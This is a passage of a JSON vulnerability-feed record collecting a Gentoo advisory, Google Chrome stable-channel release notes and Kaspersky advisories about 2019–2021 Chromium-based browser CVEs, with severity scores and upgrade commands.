for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-90.0.4430.93\"\n \n\nAll Google Chrome users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/google-chrome-90.0.4430.93\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-30T00:00:00", "type": "gentoo", "title": "Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-2119", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2021-04-30T00:00:00", "id": "GLSA-202104-08", "href": "https://security.gentoo.org/glsa/202104-08", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "chrome": [{"lastseen": "2022-12-29T20:03:17", "description": "The Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks.\n\n\n\n\n\nChrome 89.0.4389.72 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/88.0.4324.182..89.0.4389.72?pretty=fuller&n=10000>). Watch out for upcoming[ Chrome](<https://chrome.blogspot.com/>) and[ Chromium](<https://blog.chromium.org/>) blog posts about new features and big efforts delivered in 89\n\n\n\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [47](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-0-M89>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$10000][[1171049](<https://crbug.com/1171049>)] High CVE-2021-21159: Heap buffer overflow in TabStrip. Reported by Khalil Zhani on 2021-01-27\n\n[$7500][[1170531](<https://crbug.com/1170531>)] High CVE-2021-21160: Heap buffer overflow in WebAudio. Reported by Marcin 'Icewall' Noga of Cisco Talos on 2021-01-25\n\n[$7500][[1173702](<https://crbug.com/1173702>)] High CVE-2021-21161: Heap buffer overflow in TabStrip. Reported by Khalil Zhani on 2021-02-02\n\n[$5000][[1172054](<https://crbug.com/1172054>)] High CVE-2021-21162: Use after free in WebRTC. Reported by Anonymous on 2021-01-29\n\n[$TBD][[1111239](<https://crbug.com/1111239>)] High CVE-2021-21163: Insufficient data validation in Reader Mode. Reported by Alison Huffman, Microsoft Browser Vulnerability Research on 2020-07-30\n\n[$TBD][[1164846](<https://crbug.com/1164846>)] High CVE-2021-21164: Insufficient data validation in Chrome for iOS. Reported by Muneaki Nishimura (nishimunea) on 2021-01-11\n\n[$TBD][[1174582](<https://crbug.com/1174582>)] High CVE-2021-21165: Object lifecycle issue in audio. Reported by Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-04\n\n[$TBD][[1177465](<https://crbug.com/1177465>)] High CVE-2021-21166: Object lifecycle issue in audio. Reported by Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-11\n\n[$10000][[1161144](<https://crbug.com/1161144>)] Medium CVE-2021-21167: Use after free in bookmarks. Reported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22\n\n[$5000][[1152226](<https://crbug.com/1152226>)] Medium CVE-2021-21168: Insufficient policy enforcement in appcache. Reported by Luan Herrera (@lbherrera_) on 2020-11-24\n\n[$5000][[1166138](<https://crbug.com/1166138>)] Medium CVE-2021-21169: Out of bounds memory access in V8. Reported by Bohan Liu (@P4nda20371774) and Moon Liang of Tencent Security Xuanwu Lab on 2021-01-13\n\n[$3000][[1111646](<https://crbug.com/1111646>)] Medium CVE-2021-21170: Incorrect security UI in Loader. Reported by David Erceg on 2020-07-31\n\n[$3000][[1152894](<https://crbug.com/1152894>)] Medium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation. Reported by Irvan Kurniawan (sourc7) on 2020-11-25\n\n[$1000][[1150810](<https://crbug.com/1150810>)] Medium CVE-2021-21172: Insufficient policy enforcement in File System API. Reported by Maciej Pulikowski on 2020-11-19\n\n[$500][[1154250](<https://crbug.com/1154250>)] Medium CVE-2021-21173: Side-channel information leakage in Network Internals. Reported by Tom Van Goethem from imec-DistriNet, KU Leuven on 2020-12-01\n\n[$NA][[1152999](<https://crbug.com/1152999>)] Medium CVE-2021-21174: Inappropriate implementation in Referrer. Reported by Jun Kokatsu (@shhnjk) on 2020-11-26\n\n[$TBD][[1146651](<https://crbug.com/1146651>)] Medium CVE-2021-21175: Inappropriate implementation in Site isolation. Reported by Jun Kokatsu, Microsoft Browser Vulnerability Research on 2020-11-07\n\n[$TBD][[1170584](<https://crbug.com/1170584>)] Medium CVE-2021-21176: Inappropriate implementation in full screen mode. Reported by Luan Herrera (@lbherrera_) on 2021-01-26\n\n[$TBD][[1173879](<https://crbug.com/1173879>)] Medium CVE-2021-21177: Insufficient policy enforcement in Autofill. Reported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability Research on 2021-02-03\n\n[$TBD][[1174186](<https://crbug.com/1174186>)] Medium CVE-2021-21178: Inappropriate implementation in Compositing. Reported by Japong on 2021-02-03\n\n[$TBD][[1174943](<https://crbug.com/1174943>)] Medium CVE-2021-21179: Use after free in Network Internals. Reported by Anonymous on 2021-02-05\n\n[$TBD][[1175507](<https://crbug.com/1175507>)] Medium CVE-2021-21180: Use after free in tab search. Reported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability Research on 2021-02-07\n\n[$TBD][[1177875](<https://crbug.com/1177875>)] Medium CVE-2020-27844: Heap buffer overflow in OpenJPEG. Reported by Sean Campbell at Tableau on 2021-02-12\n\n[$TBD][[1182767](<https://crbug.com/1182767>)] Medium CVE-2021-21181: Side-channel information leakage in autofill. Reported by Xu Lin (University of Illinois at Chicago), Panagiotis Ilia (University of Illinois at Chicago), Jason Polakis (University of Illinois at Chicago) on 2021-02-26\n\n[$1000][[1049265](<https://crbug.com/1049265>)] Low CVE-2021-21182: Insufficient policy enforcement in navigations. Reported by Luan Herrera (@lbherrera_) on 2020-02-05\n\n[$1000][[1105875](<https://crbug.com/1105875>)] Low CVE-2021-21183: Inappropriate implementation in performance APIs. Reported by Takashi Yoneuchi (@y0n3uchy) on 2020-07-15\n\n[$1000][[1131929](<https://crbug.com/1131929>)] Low CVE-2021-21184: Inappropriate implementation in performance APIs. Reported by James Hartig on 2020-09-24\n\n[$TBD][[1100748](<https://crbug.com/1100748>)] Low CVE-2021-21185: Insufficient policy enforcement in extensions. Reported by David Erceg on 2020-06-30\n\n[$TBD][[1153445](<https://crbug.com/1153445>)] Low CVE-2021-21186: Insufficient policy enforcement in QR scanning. Reported by dhirajkumarnifty on 2020-11-28\n\n[$TBD][[1155516](<https://crbug.com/1155516>)] Low CVE-2021-21187: Insufficient data validation in URL formatting. Reported by Kirtikumar Anandrao Ramchandani on 2020-12-04\n\n[$N/A][[1161739](<https://crbug.com/1161739>)] Low CVE-2021-21188: Use after free in Blink. Reported by Woojin Oh(@pwn_expoit) of STEALIEN on 2020-12-24\n\n[$TBD][[1165392](<https://crbug.com/1165392>)] Low CVE-2021-21189: Insufficient policy enforcement in payments. Reported by Khalil Zhani on 2021-01-11\n\n[$TBD][[1166091](<https://crbug.com/1166091>)] Low CVE-2021-21190: Uninitialized Use in PDFium. Reported by Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team on 2021-01-13\n\n[$NA][[1164816](<https://crbug.com/1164816>)] Low CVE-2021-21200: Inappropriate implementation in Settings. Reported by Lucas Pinheiro, Microsoft Browser Vulnerability Research on 2021-01-11\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\n\n\nGoogle is aware of reports that an exploit for CVE-2021-21166 exists in the wild. \n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[1183883](<https://crbug.com/1183883>)] Various fixes from internal audits, fuzzing and other initiatives\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\n\n\n\nPrudhvikumar Bommana\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21200"], "modified": "2021-03-02T00:00:00", "id": "GCSA-3803715665928870837", "href": "https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-12-30T22:31:56", "description": "The stable channel has been updated to 78.0.3904.87 for Windows, Mac, and Linux, which will roll out over the coming days/weeks. \n\n\n\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [2](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-1-M78>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$7500][[1013868](<https://crbug.com/1013868>)] High CVE-2019-13721: Use-after-free in PDFium. Reported by banananapenguin on 2019-10-12\n\n[$TBD][[1019226](<https://crbug.com/1019226>)] High CVE-2019-13720: Use-after-free in audio. Reported by Anton Ivanov and Alexey Kulaev at Kaspersky Labs on 2019-10-29\n\n\n\n\nGoogle is aware of reports that an exploit for CVE-2019-13720 exists in the wild.\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\n\n\n\n\n\n\n\n\nA list of all changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/78.0.3904.70..78.0.3904.87?pretty=fuller&n=10000>). Interested in switching release channels? [ Find out how](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. \n\n\n\n\n\n\n\nSrinivas Sista \nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-31T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-10-31T00:00:00", "id": "GCSA-4512841020680293434", "href": "https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2021-08-18T10:57:43", "description": "### *Detect date*:\n03/04/2021\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browser. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, bypass security restrictions, spoof user interface, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Edge (Chromium-based)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-21190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21190>) \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21184>) \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21189>) \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21159>) \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21174>) \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21175>) \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21169>) \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21163>) \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21178>) \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21166>) \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21171>) \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21164>) \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-27844>) \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21160>) \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21188>) \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21173>) \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21182>) \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21165>) \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21183>) \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21161>) \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21167>) \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21177>) \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21176>) \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21180>) \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21170>) \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21172>) \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21179>) \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21181>) \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21186>) \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21162>) \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21185>) \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21187>) \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21168>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Edge](<https://threats.kaspersky.com/en/product/Microsoft-Edge/>)\n\n### *CVE-IDS*:\n[CVE-2020-27844](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27844>)8.3Critical \n[CVE-2021-21159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21159>)6.8High \n[CVE-2021-21160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21160>)6.8High \n[CVE-2021-21161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21161>)6.8High \n[CVE-2021-21162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21162>)6.8High \n[CVE-2021-21163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21163>)4.3Warning \n[CVE-2021-21164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21164>)4.3Warning \n[CVE-2021-21165](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21165>)6.8High \n[CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)6.8High \n[CVE-2021-21167](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21167>)6.8High \n[CVE-2021-21168](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21168>)4.3Warning \n[CVE-2021-21169](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21169>)6.8High \n[CVE-2021-21170](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21170>)4.3Warning \n[CVE-2021-21171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21171>)4.3Warning \n[CVE-2021-21172](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21172>)5.8High \n[CVE-2021-21173](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21173>)4.3Warning \n[CVE-2021-21174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21174>)6.8High \n[CVE-2021-21175](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21175>)4.3Warning \n[CVE-2021-21176](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21176>)4.3Warning \n[CVE-2021-21177](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21177>)4.3Warning \n[CVE-2021-21178](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21178>)4.3Warning \n[CVE-2021-21179](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21179>)6.8High \n[CVE-2021-21180](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21180>)6.8High \n[CVE-2021-21181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21181>)4.3Warning \n[CVE-2021-21182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21182>)4.3Warning \n[CVE-2021-21183](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21183>)4.3Warning \n[CVE-2021-21184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21184>)4.3Warning \n[CVE-2021-21185](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21185>)4.3Warning \n[CVE-2021-21186](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21186>)4.3Warning \n[CVE-2021-21187](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21187>)4.3Warning \n[CVE-2021-21188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21188>)6.8High \n[CVE-2021-21189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21189>)4.3Warning \n[CVE-2021-21190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21190>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": "kaspersky", "title": "KLA12107 Multiple vulnerabilities in Microsoft Browser", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-03-10T00:00:00", "id": "KLA12107", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12107/", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-08-18T11:05:00", "description": "### *Detect date*:\n11/14/2019\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Opera. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nOpera earlier than 65.0.3467.38\n\n### *Solution*:\nUpdate to the latest version \n[Download Opera](<https://www.opera.com>)\n\n### *Original advisories*:\n[Changelog for 65](<https://blogs.opera.com/desktop/changelog-for-65/#b3467.38>) \n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Opera](<https://threats.kaspersky.com/en/product/Opera/>)\n\n### *CVE-IDS*:\n[CVE-2019-13721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13721>)6.8High \n[CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-14T00:00:00", "type": "kaspersky", "title": "KLA11716 Multiple vulnerabilities in Opera", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2020-06-18T00:00:00", "id": "KLA11716", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11716/", "cvss": {"score": 6.8, 